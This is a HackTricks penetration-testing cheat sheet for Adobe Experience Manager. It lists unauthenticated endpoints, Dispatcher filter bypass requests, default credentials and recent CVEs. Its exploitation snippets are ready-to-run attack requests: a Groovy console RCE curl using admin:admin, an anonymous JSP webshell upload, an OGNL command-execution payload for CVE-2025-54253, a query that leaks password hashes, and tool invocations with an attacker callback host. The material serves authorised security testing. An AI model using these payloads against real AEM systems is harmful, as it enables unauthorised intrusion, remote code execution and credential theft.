aem-adobe-experience-cloud.md (8031B)
1 --- 2 title: "AEM (Adobe Experience Manager) Pentesting" 3 section: "Network Services" 4 sectionSlug: "network-services-pentesting" 5 sourcePath: "src/network-services-pentesting/pentesting-web/aem-adobe-experience-cloud.md" 6 sourceUrl: "https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/network-services-pentesting/pentesting-web/aem-adobe-experience-cloud.md" 7 sha: "188de82beb54e70956b2952367a0af91d26758b8" 8 isIndex: false 9 modified: true 10 license: "CC-BY-NC-4.0" 11 --- 12 13 # AEM (Adobe Experience Manager) Pentesting 14 15 > Adobe Experience Manager (AEM, part of the Adobe Experience Cloud) is an enterprise CMS that runs on top of Apache Sling/Felix (OSGi) and a Java Content Repository (JCR). 16 > From an attacker perspective AEM instances very often expose dangerous development endpoints, weak Dispatcher rules, default credentials and a long tail of CVEs that are patched every quarter. 17 18 The checklist below focuses on **externally reachable (unauth) attack surface** that keeps showing up in real engagements (2022-2026). 19 20 --- 21 22 ## 1. Fingerprinting 23 24 ```text 25 $ curl -s -I https://target | egrep -i "aem|sling|cq" 26 X-Content-Type-Options: nosniff 27 X-Dispatcher: hu1 # header added by AEM Dispatcher 28 X-Vary: Accept-Encoding 29 ``` 30 31 Other quick indicators: 32 * `/etc.clientlibs/` static path present (returns JS/CSS). 33 * `/libs/granite/core/content/login.html` login page with the “Adobe Experience Manager” banner. 34 * `</script><!--/* CQ */-->` comment at the bottom of HTML. 35 36 --- 37 38 ## 2. High-value unauthenticated endpoints 39 40 Path | What you get | Notes 41 ---- | ------------- | ----- 42 `/.json`, `/.1.json` | JCR nodes via **DefaultGetServlet** | Often blocked, but *Dispatcher bypass* (see below) works. 43 `/bin/querybuilder.json?path=/` | QueryBuilder API | Leak of page tree, internal paths, user names. 44 `/system/console/status-*`, `/system/console/bundles` | OSGi/Felix console | 403 by default; if exposed & creds found ⇒ bundle-upload RCE. 45 `/crx/packmgr/index.jsp` | Package Manager | Allows authenticated content packages → JSP payload upload. 46 `/etc/groovyconsole/**` | AEM Groovy Console | If exposed → arbitrary Groovy / Java execution. 47 `/libs/cq/AuditlogSearchServlet.json` | Audit logs | Information disclosure. 48 `/libs/cq/ui/content/dumplibs.html` | ClientLibs dump | XSS vector. 49 `/adminui/debug` | **AEM Forms on JEE** Struts dev-mode OGNL evaluator | On misconfigured Forms installs (CVE-2025-54253) this endpoint executes unauthenticated OGNL → RCE.<sup>[[2]](#references)[[3]](#references)</sup> 50 51 ### Dispatcher bypass tricks (still working in 2025/2026) 52 Most production sites sit behind the *Dispatcher* (reverse-proxy). Filter rules are frequently bypassed by abusing encoded characters or allowed static extensions. 53 54 *Classic semicolon + allowed extension* 55 ```text 56 GET /bin/querybuilder.json;%0aa.css?path=/home&type=rep:User HTTP/1.1 57 ``` 58 59 *Encoded slash bypass (2025 KB ka-27832)* 60 ```text 61 GET /%2fbin%2fquerybuilder.json?path=/etc&1_property=jcr:primaryType HTTP/1.1 62 ``` 63 If the Dispatcher allows encoded slashes, this returns JSON even when `/bin` is supposedly denied. 64 65 --- 66 67 ## 3. Common misconfigurations (still alive in 2026) 68 69 1. **Anonymous POST servlet** – `POST /.json` with `:operation=import` lets you plant new JCR nodes. Blocking `*.json` POST in the Dispatcher fixes it. 70 2. **World-readable user profiles** – default ACL grants `jcr:read` on `/home/users/**/profile/*` to everyone. 71 3. **Default credentials** – `admin:admin`, `author:author`, `replication:replication`. 72 4. **WCMDebugFilter** enabled ⇒ reflected XSS via `?debug=layout` (CVE-2016-7882, still found on legacy 6.4 installs). 73 5. **Groovy Console exposed** – remote code execution by sending a Groovy script: 74 ```bash 75 curl -u admin:admin -d 'script=println "pwn".execute()' https://target/bin/groovyconsole/post.json 76 ``` 77 6. **Dispatcher encoded-slash gap** – `/bin/querybuilder.json` and `/etc/truststore.json` reachable with `%2f`/`%3B` even when blocked by path filters. 78 7. **AEM Forms Struts devMode left enabled** – `/adminui/debug?expression=` evaluates OGNL without auth (CVE-2025-54253) leading to unauth RCE; paired XXE in Forms submission (CVE-2025-54254) allows file read.<sup>[[2]](#references)[[3]](#references)</sup> 79 80 --- 81 82 ## 4. Recent vulnerabilities (service-pack cadence) 83 84 Quarter | CVE / Bulletin | Affected | Impact 85 ------- | --- | -------- | ------ 86 Dec 2025 | **APSB25-115**, CVE-2025-64537/64539 | 6.5.24 & earlier, Cloud 2025.12 | Multiple critical/stored XSS → code execution via author UI.<sup>[[1]](#references)</sup> 87 Sep 2025 | APSB25-90 | 6.5.23 & earlier | Security feature bypass chain (Dispatcher auth checker) – upgrade to 6.5.24/Cloud 2025.12. 88 Aug 2025 | **CVE-2025-54253 / 54254** (AEM Forms JEE) | Forms 6.5.23.0 and earlier | DevMode OGNL RCE + XXE file read, unauthenticated.<sup>[[2]](#references)[[3]](#references)</sup> 89 Jun 2025 | APSB25-48 | 6.5.23 & earlier | Stored XSS and privilege escalation in Communities components. 90 Dec 2024 | APSB24-69 (rev. Mar 2025 adds CVE-2024-53962…74) | 6.5.22 & earlier | DOM/Stored XSS, arbitrary code exec (low-priv). 91 Dec 2023 | APSB23-72 | ≤ 6.5.18 | DOM-based XSS via crafted URL. 92 93 Always check the *APSB* bulletin matching the customer’s service-pack and push for the latest **6.5.24 (Nov 26, 2025)** or **Cloud Service 2025.12**. AEM Forms on JEE requires its own add-on hotfix **6.5.0-0108+**. 94 95 --- 96 97 ## 5. Exploitation snippets 98 99 ### 5.1 RCE via dispatcher bypass + JSP upload 100 If anonymous write is possible: 101 ```text 102 # 1. Create a node that will become /content/evil.jsp 103 POST /content/evil.jsp;%0aa.css HTTP/1.1 104 Content-Type: application/x-www-form-urlencoded 105 106 :contentType=text/plain 107 jcr:data=<% out.println("pwned"); %> 108 :operation=import 109 ``` 110 Now request `/content/evil.jsp` – the JSP runs with the AEM process user. 111 112 ### 5.2 SSRF to RCE (historical < 6.3) 113 `/libs/mcm/salesforce/customer.html;%0aa.css?checkType=authorize&authorization_url=http://127.0.0.1:4502/system/console` 114 `aem_ssrf2rce.py` from **aem-hacker** automates the full chain. 115 116 ### 5.3 OGNL RCE on AEM Forms JEE (CVE-2025-54253) 117 ```text 118 # Unauth devMode OGNL to run whoami 119 curl -k "https://target:8443/adminui/debug?expression=%23cmd%3D%27whoami%27,%23p=new%20java.lang.ProcessBuilder(%23cmd).start(),%23out=new%20java.io.InputStreamReader(%23p.getInputStream()),%23br=new%20java.io.BufferedReader(%23out),%23br.readLine()" 120 ``` 121 If vulnerable, the HTTP body contains the command output.<sup>[[2]](#references)</sup> 122 123 ### 5.4 QueryBuilder hash disclosure (encoded slash bypass) 124 ```text 125 GET /%2fbin%2fquerybuilder.json?path=/home&type=rep:User&p.hits=full&p.nodedepth=2&p.offset=0 HTTP/1.1 126 ``` 127 Returns user nodes including `rep:password` hashes when anonymous read ACLs are default. 128 129 --- 130 131 ## 6. Tooling 132 133 * **aem-hacker** – Swiss-army enumeration script, supports dispatcher bypass, SSRF detection, default-creds checks and more. 134 ```bash 135 python3 aem_hacker.py -u https://target --host attacker-ip 136 ``` 137 * **Tenable WAS plugin 115065** – Detects QueryBuilder hash disclosure & encoded-slash bypass automatically (published Dec 2025). 138 * **Content brute-force** – recursively request `/_jcr_content.(json|html)` to discover hidden components. 139 * **osgi-infect** – upload malicious OSGi bundle via `/system/console/bundles` if creds available. 140 141 ## References 142 143 - [1] [Adobe Security Bulletin APSB25-115 – Security updates for Adobe Experience Manager (Dec 9, 2025)](https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html) 144 - [2] [Struts Devmode in 2025? Critical Pre-Auth Vulnerabilities in Adobe Experience Manager Forms](https://slcyber.io/assetnote-security-research-center/struts-devmode-in-2025-critical-pre-auth-vulnerabilities-in-adobe-experience-manager-forms) 145 - [3] [BleepingComputer – Adobe issues emergency fixes for AEM Forms zero-days (Aug 5, 2025)](https://www.bleepingcomputer.com/news/security/adobe-issues-emergency-fixes-for-aem-forms-zero-days-after-pocs-released/)